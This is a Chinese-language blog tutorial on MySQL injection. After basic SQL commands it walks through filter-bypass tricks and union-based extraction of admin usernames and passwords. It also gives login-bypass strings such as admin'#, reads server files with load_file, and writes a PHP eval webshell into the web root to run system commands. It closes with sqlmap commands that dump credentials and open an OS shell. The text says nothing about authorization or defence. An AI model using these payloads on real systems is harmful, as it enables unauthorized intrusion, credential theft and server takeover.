Mysql的注入

最新推荐文章于 2024-07-23 13:22:23 发布
最新推荐文章于 2024-07-23 13:22:23 发布
阅读量202 收藏
点赞数
分类专栏: 白帽子 注入 文章标签: 网安 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44790964/article/details/102595483
版权

如果碰到防注入的一些过滤代码
可以用/**/,+%0a,代替空格 大小写的改变

mysql安装大家可以百度一下
linux安装的话可以用yum -y install httpd php-mysql
mysql mysql-server
Mysql
打开并启动下phpstudy
在这里插入图片描述然后点击其它选项菜单
选择MySQL工具
选择mysql命令行
在这里插入图片描述在这里插入图片描述然后输入密码 密码一般是root
在这里插入图片描述进入之后输入命令
show databases;
目的是看里边当前有哪些数据库
如果你想使用数据库就可以use 数据库名;
然后show tables;这个是看一下里边有哪些表
在这里插入图片描述如果想要查某一个表
select * from 表名;
在这里插入图片描述select user,password from 表名;
在这里插入图片描述这样就看到了
如果想创建一个数据库的话
create database xx;
在这里插入图片描述然后使用你创建的这个xx数据库
在数据库里创建一个表 名字叫username char类型数字长度50 密码 char类型 长度50
create table 表名(username char(50),password char(50));
在这里插入图片描述
就会创建一个表
添加数据 可以添加用户 密码 当然也可以加密用md5的函数把密码加密
insert into admin(username,password)values (‘admin’,md5(‘admin’));
然后你再用
select * from admin;来查看一下
在这里插入图片描述就能看到自己插入的内容了
如果你想要插入多行怎么做呢
就直接在刚才的语句后面加入,‘用户名’,‘密码’;就可以了
比如;insert into admin(username,password)values (‘admin’,md5(‘admin’)),(‘用户名’,‘密码’);
如果密码是加密的话还是md5(‘密码’);
在这里插入图片描述 所以可以一次性用逗号分隔开一次性插几行都可以.
如果要改数据的话
用update admin set password=‘123456’ where username=‘rgw’(意思就是修改密码为123456,修改稿谁的呢 就是where后面的 rgw用户的密码)
在这里插入图片描述这样就修改完成了.
那怎么删除呢
delete from admin where username=‘rgw’;
在这里插入图片描述那怎么删除表呢
drop table admin;
那怎么删除库呢(先使用别的库才能删除你要删除的库)
drop database 库名;
接下来我演示一下
在这里插入图片描述在这里插入图片描述这样 表和数据库就能够删除了
记住删除数据库一定要先使用别的数据库在删除你要删除的数据库

还有一些Msql数据库需要记住
在这里插入图片描述比如查看系统用户
select system_user();
查看当前版本
select version();
在这里插入图片描述比如查看当前数据库路径
select @@basedir;
在这里插入图片描述还有个命令可以是去查看读文件
select load_file(‘路径比如c;/文件名’);

Mysql数据库连接
在这里插入图片描述-config.php可能是配置文件.
data 或者include中可能找到
数据库结构对比.
在这里插入图片描述Mysql注入原理
与access是一样的
防注入绕过
大小写绕过
%00编码绕过.
判断入住
and 1=1 返回正常
and 1=2 返回不正常
说明存在注入
这种情况是无waf的
有的话就拦截了

/报错 -0正常这种waf是不拦截的

判断多少列
order by xx
order by 21正常 order by 22不正常 说明长度为21

union select 1,2,3,4,5,6,…(写到多少取决于他有多少列)
在网址前加一个 and 1=2 让它报错 页面会显示出错误 2 也可以在前面加- 也会报错 显示出2
那显示出的是什么呢?显示的是非数字类型,一些的字符类型一些列
在这里插入图片描述在这里插入图片描述为什么写1,2,3,4,5,6,7,8,9,为了更清晰的看出是那些列是数字类型的列
在这里插入图片描述比如这样就是在第二列 输入user()
暴出的错误就是相对应2列对应的用户名
在这里插入图片描述然后这个是第二列的数据库名称
暴出对应的就是第2列对应的数据库名称
如果在2列上查不出来东西 你的语句也没错 那就试试其他的列

UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema tables where table_schema=‘暴出的库名’
意思就是(指定这个数据库暴出表名) 有group_concat是能够暴出很多的表名 没有的话就有一个表名
在这里插入图片描述有些元素的话 显示的不是很完整可以右键用firebug查看元素
在这里插入图片描述然后把它给复制出来
然后就是看那个表里管理员的用户密码 因为我们要进后台 所以要看一些管理员的表
然后找到管理员表的名称
注意下 我们是用字符暴的
但这种直接的可能会出错
所以我们可以把数据库名称转成16进制在进行暴就可以了
然后继续 我们知道了管理员的表名称就可以暴表
在这里插入图片描述UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema columns where table_name=‘就是你要暴的管理员表名’
这就是暴出表名下的一些列名

现在知道的管理员的表名 和管理员的列名

UNION SELECT 1,group_concat(表下得列名),3,4,5,6,7,8 from 就是你要暴的管理员表名
在这里插入图片描述这样就列出了管理员的表下的列名的用户密码

Mysql 4.0渗透
4.0就不能手工了
利用这些方法渗透
在这里插入图片描述手工必须是5.0以上的才能手工
在这里插入图片描述网页地址 union select 1,version(),2,3,4,5,6,7
所以以后测的时候要先看下版本
在这里插入图片描述Mysql显错注入

在这里插入图片描述在这里插入图片描述像这种的 有的就是用‘’单引号进行闭合的,我们在登录的时候 在后边加上一个单引号看是否报错,出现sql语句报错 那这就是显错注入
类似这种
在这里插入图片描述那显错注入怎么暴呢
在这里插入图片描述用这条语句就可以了
直接用这个语句放入登录账号上
在这里插入图片描述直接登录就可以了
在这里插入图片描述就会暴出这些,就能够暴出数据库
然后在这里插入图片描述再用这个语句 就能暴出数据库的
在这里插入图片描述这个是暴 版本的
在这里插入图片描述limit0,1交替就可以了
username改成password 就能暴出密码了
还有这些
直接用就可以了
有的暴出来是数字
进行转换就可以了

假如你知道账号的话 他还是用单引号闭合的话
可以在用户栏 那里填入正确的用户名在加个单引号和井号
比如 admin’# 这样可以绕过密码了
这个语句的意思就是 admin单引号和另一个单引号完成了闭合 #就是忽略掉后面的验证 就是注释掉 就是密码验证 所以不用登陆password密码也能完成登陆
在这里插入图片描述还可以
admin‘ or ’ 1=1’
这样也是可以的 2次的单引号闭合 有一个为真就

流程
先去找到一个登陆的网站
先加个单引号
admin‘
密码随便写
回车 看一下暴出来的问题
出现一些 you have erro sql 类似的字样就是显错注入
判断完事 显错注入就可以
用 admin’#
密码写不写都行 就可以直接登录了
或者 asda’ or ‘1’=‘1’#
密码也是随便写 就可以登录了
关键只在于闭合

Mysql读写函数的使用

在这里插入图片描述网址 UNION SELECT 1,load_file(c;/),3,4,5,6,7,8,9,10.
如果写window要写2个/
写linux写1个/
如果想要读网站的内容
获取网站根路径
就是让它报错在登录的时候 有时候也会把路径暴出来
在这里插入图片描述补充下 /etc/httpd/conf/httpd.conf
User/local/httpd/conf/httpd.conf
读取网站文件内容
在这里插入图片描述
比如想要读c盘的
可以用load_file命令
写入函数 into outfile
在这里插入图片描述怎么写入脚本文件?
在这里插入图片描述
网页 UNION SELECT 1,“<?php eval($_GET[x]);?>”,3,4,5,6,7,8,9,10 into outfile ‘c;/inetpub/wwwroot/8006/cracer.txt’
这个语句就把
第二列的位置写的就是一句话
后边 into outlife 是写的你知道的绝对路径 以及写入的文件名
写入的一句话木马后

网页 UNION SELECT 1,“<?php @eval($_GET[x]);?>”,3,4,5,6,7,8,9,10 into outfile ‘c;/inetpub/wwwroot/8006/cc.php’

加@符让它容一下错
要怎么执行代码呢
网址 cc.php?x=phpinfo();
在这里插入图片描述

这样就执行了代码
然后想要执行系统命令
网址 cc.php就可以看能不能执行了
cc.php?x=ipconfig这样就能进行一些操作了

利用注入漏洞执行系统命令.

在这里插入图片描述魔术引号与宽字节注入
在这里插入图片描述关于魔术单引号注入
在这里插入图片描述在这里插入图片描述
网页 UNION SELECT ,group_concat(username,password),3,4,5,6,7,8,9,10 from manage_user limit 2,1 –

sqlmap.py -u "你要测试的网址"
有注入的话
sqlmap.py -u “你要测试的网址” --is-dbs
看当前是不是管理员 如果是就返回true
如果是管理员
sqlmap.py -u “你要测试的网址” --dbs
列一下其他的数据库
sqlmap.py -u “你要测试的网址” --current-db
看一下当前自己的数据库
sqlmap.py -u “你要测试的网址” --tables -D 库名
看一下库里的表
sqlmap.py -u “你要测试的网址” --columns -T manage -D 库名
(主要是找管理员的这个表,要信息)
sqlmap.py -u “你要测试的网址” --dump -C m_name,m_pwd -T manage_user -D 库名
这里是下载数据 主要就是管理员用户密码
sqlmap.py -u “你要测试的网址” --os-shell
这个是可以执行系统命令了 这里会选择木马 上传的文件 以及一些路径 可以上传任意文件,这样就可以执行系统命令了
select version();
查看版本
select load_file(c;\路径) 这是读文件
在sqlmap里只能读 不能写

『潺湲¢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali mysql注入_kali之sql注入
weixin_42227109的博客
01-19 1751
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的的操作系统...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
Mysql注入
天天学安全专属博客
10-28 4252
mysql注入,包括union注入,数据库跨库注入,常见的注入绕过方法和数据库文件读写
mysql 注入
qq_58970968的博客
07-31 1945
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
Mysql注入详细讲解
2401_84466359的博客
05-24 854
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
mysql 注入语句_MYSQL注入语句
weixin_33007509的博客
01-18 1161
一、信息查询 information_schema是MySQL 5.0后产生的虚拟数据库,提供访问数据库元数据的方式,即数据的数据。比如数据库所有库名或表名,列类型,访问权限。MYsql 5.X以上版本的注入查询主要基于information_schem1.UNION 注入 (联合查询注入) ≥ MySQL 5 information_schema (信息数据库),其中保存着关于 My...
MySQL注入
m0_48907714的博客
04-01 2039
判定有注入的原因 ?id=1XXXX XXXX随便输入,如果有报错则有注入,没有则没有注入 MySQL version >5.0 判断字段数 ?id=1 order by 1 --+ ?id=1 order by 4 --+ 直到有报错,那么字段数就是此时数-1 判断回显点 ?id=1 union select 1,2,3,4 --+ 有几个字段写几个数字 在回显点查看其他信息 ?id=1 union select 1,version(),database(),4 --+ u
Mysql注入_基础
ccz4854的博客
04-27 1410
Mysql注入类型 union 联合查询 布尔盲注 时间盲注 显错注入 堆叠注入 宽字节注入 (只存在PHP) Mysql各类型注入语句 1.union 联合查询(sql查询语句),存在mysql的版本问题 下方是5.0之后版本的利用方式 5.0之后的版本存在 information_schema 表 :information_schema 是 一个虚拟数据库 information_schema数据库类似与“数据字典”,提供了访问数据库元数据的方式,即数据的数据。 如数据库名或表名,列类型,访问权
MySQL注入秘籍【上篇】
大河之犬的博客
03-21 941
通常使用联合查询注入法,其作用就是,在原来查询条件的基础上,通过关键字union、union all拼接恶意SQL语句,union后面的select得到的结果将拼接到前个select的结果的后面。既然已经知道了查询列数了,那我们就需要判断哪些列的内容是可以显示到前端的,因为能显示到前端的字段,我们在利用时也能直接显示我们想要的数据。报错原理:e的x次方到x每增加1,其结果都将跨度极大,而mysql能记录的double数值范围有限,一旦结果超过范围,则该函数报错。直接查询数据库,不需要判断字段数、显位等;
mysql注入
weixin_34365417的博客
04-08 3466
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行. ...
mysql注入之dns注入
seek_2022的博客
05-03 1974
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
SQL注入MYSQL注入
av11566的博客
04-19 7116
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
mysql注入绕过技术
06-04
### MySQL注入绕过技术 #### 引言 在网络安全领域,SQL注入是一种常见的攻击手段,攻击者通过在应用程序中插入恶意SQL代码来控制数据库。针对这种威胁,许多开发者实施了过滤机制来防御潜在的SQL注入攻击。然而,...
第01篇:MySQL注入点写WebShell的5种方式1
08-03
MySQL注入是一种常见的安全漏洞,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要...
mysql注入环境
01-16
MySQL注入环境是一个重要的网络安全话题,主要关注的是数据库系统的安全性和数据保护。在本文中,我们将深入探讨MySQL注入的原理、如何在Linux或Windows环境中搭建测试环境,以及如何使用sqli-labs进行实战演练。 ...
MYSQL
最新发布
maoqiwei的博客
07-23 221
1.修改student 表中年龄(sage)字段属性,数据类型由int 改变为smallint 2.为Course表中Cno 课程号字段设置索引,并查看索引 3.为SC表建立按学号(sno)和课程号(cno)组合的升序的主键索引,索引名为SC_INDEX4.创建一视图 stu info,查询全体学生的姓名,性别,课程名,成绩5.删除所有索引
测试开发面试题---MySQL
m0_53302824的博客
07-22 995
索引是数据库管理系统中用于提高数据检索速度的数据结构,它可以帮助快速定位数据不需要扫描全表。提高查询速度;唯一性约束,确保数据不会重复;辅助排序和分组;减少磁盘IO。
MySQL字段设置的varchar长度小于数据长度自动截取丢弃超出的长度而不是报错?
weixin_43831997的博客
07-23 324
MySQL数据库设置为==严格模式(STRICT_TRANS_TABLES 或 STRICT_ALL_TABLES)==时,如果尝试插入或更新超过设定长度的数据,将会导致错误,并阻止该事务进行。在默认情况下,或者在非严格模式(NO_STRICT)下,当插入长度超出 VARCHAR 字段定义的字符串时,MySQL会自动截断超出的部分,并发出一个警告,而不是错误。
mysql 注入扫描
12-02
MySQL注入扫描是一种针对网站或应用程序的安全漏洞进行检测的技术。通过MySQL注入漏洞,攻击者可以将恶意代码注入到网站或应用程序中,从而获取敏感信息、通过数据库执行命令或者破坏网站功能。因此,对于网站或应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值